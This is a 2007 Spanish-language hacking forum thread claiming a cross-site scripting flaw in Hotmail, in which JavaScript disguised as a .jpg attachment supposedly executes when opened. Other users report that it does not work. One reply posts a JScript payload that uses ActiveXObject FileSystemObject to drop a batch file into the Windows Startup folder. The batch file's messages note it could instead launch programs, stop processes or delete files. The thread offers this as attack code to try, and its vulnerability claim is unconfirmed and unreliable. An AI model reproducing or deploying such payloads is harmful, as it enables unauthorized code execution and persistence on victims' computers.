hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
06 de Octubre de 2008, 09:31:21
Noticias: Participa en el batch lab de CPH
Para ver este enlace Registrate o Inicia Sesion
aqui

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderador: vengador de las sombras)
| | |-+  Nueva vulnerabilidad en Hotmail
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Nueva vulnerabilidad en Hotmail  (Leído 627 veces)
Dark Allien
Recien llegado
*
Desconectado Desconectado

Mensajes: 23


Ver Perfil
« : 09 de Mayo de 2007, 06:35:20 »

Me encontre navegando por ahy que el hotmail tiene un  nuevo fallo de Cross Site Scripting en Hotmail, total el perro hotmail no canta nada si envias un archivo de texto echo por ejemplo con el bloc de notas con código javascript por ejemplo de una alerta:


<script language="JavaScript">
  alert(' ZaBoo script alert');
</script>

 y lo guardas con formato "jpg", bueno luego lo adjuntas y envias y al recibir el archivo y probar en ver el adjunto pum kiss te ejecuta el codigo, para mas informacion dirigirse a
Para ver este enlace Registrate o Inicia Sesion o
Para ver este enlace Registrate o Inicia Sesion

By: Dark allien
En línea
piojo_tem
Visitante
« Respuesta #1 : 09 de Mayo de 2007, 02:21:15 »

a mi no me funka :S
En línea
matrix_hc85
NZ2
**
Desconectado Desconectado

Mensajes: 203


pasemonos a linux y seamos libres xD


Ver Perfil
« Respuesta #2 : 09 de Mayo de 2007, 08:45:41 »

a mi tampoco.  sera q funciona en alguna version beta de hotmail?
En línea

atte zYrox
maxwellnewage
Colaborador
****
Desconectado Desconectado

Mensajes: 1,480



Ver Perfil WWW
« Respuesta #3 : 10 de Mayo de 2007, 05:44:31 »

aca un code q les sirve......... ....
<script language="JavaScript">
Contenido=
  '@echo off\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo Esto es solo una prueba, pero podria haber llamado a algun programa...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo O podria, tambien, detener o activar procesos...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo O, incluso, podria haber borrado algun archivo...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo No se... echale imaginacion...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'exit\r\n'
Archivo=new ActiveXObject("Scripting.File SystemObject")
Escribe=Archivo.CreateTextFile("c:\\Documents and Settings\\Administrador\\Menú Inicio\\Programas\\Inicio\\bat.bat" ,true);
Escribe.WriteL ine(Contenido);
Escribe.close();
</script>
En línea


Para ver este enlace Registrate o Inicia Sesion
ESCUELA DE HACKING
matrix_hc85
NZ2
**
Desconectado Desconectado

Mensajes: 203


pasemonos a linux y seamos libres xD


Ver Perfil
« Respuesta #4 : 10 de Mayo de 2007, 02:02:58 »

ok. perfecto. voy a probar, pero deberia funcionar para cualquier codigo en script !! no solo en el que creas tu, sino que sentido tiene. 
En línea

atte zYrox
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online